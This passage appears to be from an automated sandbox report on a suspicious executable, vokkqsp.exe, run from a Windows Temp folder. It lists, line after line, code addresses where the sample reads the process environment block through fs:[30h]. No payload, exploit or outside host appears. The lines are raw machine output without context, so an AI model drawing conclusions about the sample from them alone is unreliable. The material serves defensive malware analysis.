          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9002D mov eax, dword ptr fs:[00000030h]3_2_00A9002D
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9002D mov eax, dword ptr fs:[00000030h]3_2_00A9002D
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9002D mov eax, dword ptr fs:[00000030h]3_2_00A9002D
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A7B02A mov eax, dword ptr fs:[00000030h]3_2_00A7B02A
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A7B02A mov eax, dword ptr fs:[00000030h]3_2_00A7B02A
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A7B02A mov eax, dword ptr fs:[00000030h]3_2_00A7B02A
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A7B02A mov eax, dword ptr fs:[00000030h]3_2_00A7B02A
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B34015 mov eax, dword ptr fs:[00000030h]3_2_00B34015
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B34015 mov eax, dword ptr fs:[00000030h]3_2_00B34015
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE7016 mov eax, dword ptr fs:[00000030h]3_2_00AE7016
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE7016 mov eax, dword ptr fs:[00000030h]3_2_00AE7016
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE7016 mov eax, dword ptr fs:[00000030h]3_2_00AE7016
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B22073 mov eax, dword ptr fs:[00000030h]3_2_00B22073
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B31074 mov eax, dword ptr fs:[00000030h]3_2_00B31074
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A80050 mov eax, dword ptr fs:[00000030h]3_2_00A80050
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A80050 mov eax, dword ptr fs:[00000030h]3_2_00A80050
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE69A6 mov eax, dword ptr fs:[00000030h]3_2_00AE69A6
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A961A0 mov eax, dword ptr fs:[00000030h]3_2_00A961A0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A961A0 mov eax, dword ptr fs:[00000030h]3_2_00A961A0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE51BE mov eax, dword ptr fs:[00000030h]3_2_00AE51BE
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE51BE mov eax, dword ptr fs:[00000030h]3_2_00AE51BE
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE51BE mov eax, dword ptr fs:[00000030h]3_2_00AE51BE
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE51BE mov eax, dword ptr fs:[00000030h]3_2_00AE51BE
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A8C182 mov eax, dword ptr fs:[00000030h]3_2_00A8C182
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9A185 mov eax, dword ptr fs:[00000030h]3_2_00A9A185
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A92990 mov eax, dword ptr fs:[00000030h]3_2_00A92990
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]3_2_00A6B1E1
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]3_2_00A6B1E1
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]3_2_00A6B1E1
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AF41E8 mov eax, dword ptr fs:[00000030h]3_2_00AF41E8
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A84120 mov eax, dword ptr fs:[00000030h]3_2_00A84120
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A84120 mov eax, dword ptr fs:[00000030h]3_2_00A84120
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A84120 mov eax, dword ptr fs:[00000030h]3_2_00A84120
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A84120 mov eax, dword ptr fs:[00000030h]3_2_00A84120
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A84120 mov ecx, dword ptr fs:[00000030h]3_2_00A84120
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9513A mov eax, dword ptr fs:[00000030h]3_2_00A9513A
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9513A mov eax, dword ptr fs:[00000030h]3_2_00A9513A
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A69100 mov eax, dword ptr fs:[00000030h]3_2_00A69100
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A69100 mov eax, dword ptr fs:[00000030h]3_2_00A69100
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A69100 mov eax, dword ptr fs:[00000030h]3_2_00A69100
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A6C962 mov eax, dword ptr fs:[00000030h]3_2_00A6C962
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A6B171 mov eax, dword ptr fs:[00000030h]3_2_00A6B171
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A6B171 mov eax, dword ptr fs:[00000030h]3_2_00A6B171
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A8B944 mov eax, dword ptr fs:[00000030h]3_2_00A8B944
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A8B944 mov eax, dword ptr fs:[00000030h]3_2_00A8B944
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A652A5 mov eax, dword ptr fs:[00000030h]3_2_00A652A5
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A652A5 mov eax, dword ptr fs:[00000030h]3_2_00A652A5
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A652A5 mov eax, dword ptr fs:[00000030h]3_2_00A652A5
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A652A5 mov eax, dword ptr fs:[00000030h]3_2_00A652A5
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A652A5 mov eax, dword ptr fs:[00000030h]3_2_00A652A5
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A7AAB0 mov eax, dword ptr fs:[00000030h]3_2_00A7AAB0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A7AAB0 mov eax, dword ptr fs:[00000030h]3_2_00A7AAB0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9FAB0 mov eax, dword ptr fs:[00000030h]3_2_00A9FAB0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9D294 mov eax, dword ptr fs:[00000030h]3_2_00A9D294
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9D294 mov eax, dword ptr fs:[00000030h]3_2_00A9D294
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A92AE4 mov eax, dword ptr fs:[00000030h]3_2_00A92AE4
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A92ACB mov eax, dword ptr fs:[00000030h]3_2_00A92ACB
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA4A2C mov eax, dword ptr fs:[00000030h]3_2_00AA4A2C
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA4A2C mov eax, dword ptr fs:[00000030h]3_2_00AA4A2C
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B2AA16 mov eax, dword ptr fs:[00000030h]3_2_00B2AA16
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B2AA16 mov eax, dword ptr fs:[00000030h]3_2_00B2AA16
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A78A0A mov eax, dword ptr fs:[00000030h]3_2_00A78A0A
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A6AA16 mov eax, dword ptr fs:[00000030h]3_2_00A6AA16
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A6AA16 mov eax, dword ptr fs:[00000030h]3_2_00A6AA16
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A83A1C mov eax, dword ptr fs:[00000030h]3_2_00A83A1C
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A65210 mov eax, dword ptr fs:[00000030h]3_2_00A65210
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A65210 mov ecx, dword ptr fs:[00000030h]3_2_00A65210
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A65210 mov eax, dword ptr fs:[00000030h]3_2_00A65210
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A65210 mov eax, dword ptr fs:[00000030h]3_2_00A65210
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA927A mov eax, dword ptr fs:[00000030h]3_2_00AA927A
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B1B260 mov eax, dword ptr fs:[00000030h]3_2_00B1B260
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B1B260 mov eax, dword ptr fs:[00000030h]3_2_00B1B260
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B38A62 mov eax, dword ptr fs:[00000030h]3_2_00B38A62
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A69240 mov eax, dword ptr fs:[00000030h]3_2_00A69240
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A69240 mov eax, dword ptr fs:[00000030h]3_2_00A69240
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A69240 mov eax, dword ptr fs:[00000030h]3_2_00A69240
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A69240 mov eax, dword ptr fs:[00000030h]3_2_00A69240
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B2EA55 mov eax, dword ptr fs:[00000030h]3_2_00B2EA55
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AF4257 mov eax, dword ptr fs:[00000030h]3_2_00AF4257
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A94BAD mov eax, dword ptr fs:[00000030h]3_2_00A94BAD
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A94BAD mov eax, dword ptr fs:[00000030h]3_2_00A94BAD
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A94BAD mov eax, dword ptr fs:[00000030h]3_2_00A94BAD
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B35BA5 mov eax, dword ptr fs:[00000030h]3_2_00B35BA5
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A71B8F mov eax, dword ptr fs:[00000030h]3_2_00A71B8F
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A71B8F mov eax, dword ptr fs:[00000030h]3_2_00A71B8F
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B1D380 mov ecx, dword ptr fs:[00000030h]3_2_00B1D380
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B2138A mov eax, dword ptr fs:[00000030h]3_2_00B2138A
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9B390 mov eax, dword ptr fs:[00000030h]3_2_00A9B390
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A92397 mov eax, dword ptr fs:[00000030h]3_2_00A92397
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A8DBE9 mov eax, dword ptr fs:[00000030h]3_2_00A8DBE9
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A903E2 mov eax, dword ptr fs:[00000030h]3_2_00A903E2
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A903E2 mov eax, dword ptr fs:[00000030h]3_2_00A903E2
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A903E2 mov eax, dword ptr fs:[00000030h]3_2_00A903E2
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A903E2 mov eax, dword ptr fs:[00000030h]3_2_00A903E2
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A903E2 mov eax, dword ptr fs:[00000030h]3_2_00A903E2
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A903E2 mov eax, dword ptr fs:[00000030h]3_2_00A903E2
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE53CA mov eax, dword ptr fs:[00000030h]3_2_00AE53CA
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE53CA mov eax, dword ptr fs:[00000030h]3_2_00AE53CA
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B2131B mov eax, dword ptr fs:[00000030h]3_2_00B2131B
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A6DB60 mov ecx, dword ptr fs:[00000030h]3_2_00A6DB60
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A93B7A mov eax, dword ptr fs:[00000030h]3_2_00A93B7A
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A93B7A mov eax, dword ptr fs:[00000030h]3_2_00A93B7A
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A6DB40 mov eax, dword ptr fs:[00000030h]3_2_00A6DB40
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B38B58 mov eax, dword ptr fs:[00000030h]3_2_00B38B58
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A6F358 mov eax, dword ptr fs:[00000030h]3_2_00A6F358
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A7849B mov eax, dword ptr fs:[00000030h]3_2_00A7849B
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B214FB mov eax, dword ptr fs:[00000030h]3_2_00B214FB
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]3_2_00AE6CF0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]3_2_00AE6CF0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]3_2_00AE6CF0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B38CD6 mov eax, dword ptr fs:[00000030h]3_2_00B38CD6
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9BC2C mov eax, dword ptr fs:[00000030h]3_2_00A9BC2C
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE6C0A mov eax, dword ptr fs:[00000030h]3_2_00AE6C0A
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE6C0A mov eax, dword ptr fs:[00000030h]3_2_00AE6C0A
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE6C0A mov eax, dword ptr fs:[00000030h]3_2_00AE6C0A
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE6C0A mov eax, dword ptr fs:[00000030h]3_2_00AE6C0A
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]3_2_00B21C06
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]3_2_00B21C06
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]3_2_00B21C06
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]3_2_00B21C06
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]3_2_00B21C06
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]3_2_00B21C06
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]3_2_00B21C06
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]3_2_00B21C06
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]3_2_00B21C06
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]3_2_00B21C06
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]3_2_00B21C06
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]3_2_00B21C06
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]3_2_00B21C06
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]3_2_00B21C06
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B3740D mov eax, dword ptr fs:[00000030h]3_2_00B3740D
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B3740D mov eax, dword ptr fs:[00000030h]3_2_00B3740D
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B3740D mov eax, dword ptr fs:[00000030h]3_2_00B3740D
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A8746D mov eax, dword ptr fs:[00000030h]3_2_00A8746D
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9A44B mov eax, dword ptr fs:[00000030h]3_2_00A9A44B
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AFC450 mov eax, dword ptr fs:[00000030h]3_2_00AFC450
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AFC450 mov eax, dword ptr fs:[00000030h]3_2_00AFC450
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A935A1 mov eax, dword ptr fs:[00000030h]3_2_00A935A1
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A91DB5 mov eax, dword ptr fs:[00000030h]3_2_00A91DB5
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A91DB5 mov eax, dword ptr fs:[00000030h]3_2_00A91DB5
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A91DB5 mov eax, dword ptr fs:[00000030h]3_2_00A91DB5
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B305AC mov eax, dword ptr fs:[00000030h]3_2_00B305AC
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B305AC mov eax, dword ptr fs:[00000030h]3_2_00B305AC
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A92581 mov eax, dword ptr fs:[00000030h]3_2_00A92581
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A92581 mov eax, dword ptr fs:[00000030h]3_2_00A92581
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A92581 mov eax, dword ptr fs:[00000030h]3_2_00A92581
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A92581 mov eax, dword ptr fs:[00000030h]3_2_00A92581
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A62D8A mov eax, dword ptr fs:[00000030h]3_2_00A62D8A
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A62D8A mov eax, dword ptr fs:[00000030h]3_2_00A62D8A
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A62D8A mov eax, dword ptr fs:[00000030h]3_2_00A62D8A
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A62D8A mov eax, dword ptr fs:[00000030h]3_2_00A62D8A
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A62D8A mov eax, dword ptr fs:[00000030h]3_2_00A62D8A
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9FD9B mov eax, dword ptr fs:[00000030h]3_2_00A9FD9B
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9FD9B mov eax, dword ptr fs:[00000030h]3_2_00A9FD9B
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B18DF1 mov eax, dword ptr fs:[00000030h]3_2_00B18DF1
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A7D5E0 mov eax, dword ptr fs:[00000030h]3_2_00A7D5E0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A7D5E0 mov eax, dword ptr fs:[00000030h]3_2_00A7D5E0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B2FDE2 mov eax, dword ptr fs:[00000030h]3_2_00B2FDE2
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B2FDE2 mov eax, dword ptr fs:[00000030h]3_2_00B2FDE2
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B2FDE2 mov eax, dword ptr fs:[00000030h]3_2_00B2FDE2
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B2FDE2 mov eax, dword ptr fs:[00000030h]3_2_00B2FDE2
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]3_2_00AE6DC9
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]3_2_00AE6DC9
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]3_2_00AE6DC9
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE6DC9 mov ecx, dword ptr fs:[00000030h]3_2_00AE6DC9
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]3_2_00AE6DC9
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]3_2_00AE6DC9
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B38D34 mov eax, dword ptr fs:[00000030h]3_2_00B38D34
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B2E539 mov eax, dword ptr fs:[00000030h]3_2_00B2E539
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A94D3B mov eax, dword ptr fs:[00000030h]3_2_00A94D3B
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A94D3B mov eax, dword ptr fs:[00000030h]3_2_00A94D3B
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A94D3B mov eax, dword ptr fs:[00000030h]3_2_00A94D3B
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]3_2_00A73D34
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]3_2_00A73D34
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]3_2_00A73D34
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]3_2_00A73D34
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]3_2_00A73D34
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]3_2_00A73D34
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]3_2_00A73D34
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]3_2_00A73D34
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]3_2_00A73D34
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]3_2_00A73D34
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]3_2_00A73D34
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]3_2_00A73D34
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]3_2_00A73D34
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A6AD30 mov eax, dword ptr fs:[00000030h]3_2_00A6AD30
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AEA537 mov eax, dword ptr fs:[00000030h]3_2_00AEA537
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A8C577 mov eax, dword ptr fs:[00000030h]3_2_00A8C577
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A8C577 mov eax, dword ptr fs:[00000030h]3_2_00A8C577
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA3D43 mov eax, dword ptr fs:[00000030h]3_2_00AA3D43
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE3540 mov eax, dword ptr fs:[00000030h]3_2_00AE3540
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A87D50 mov eax, dword ptr fs:[00000030h]3_2_00A87D50
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE46A7 mov eax, dword ptr fs:[00000030h]3_2_00AE46A7
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B30EA5 mov eax, dword ptr fs:[00000030h]3_2_00B30EA5
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B30EA5 mov eax, dword ptr fs:[00000030h]3_2_00B30EA5
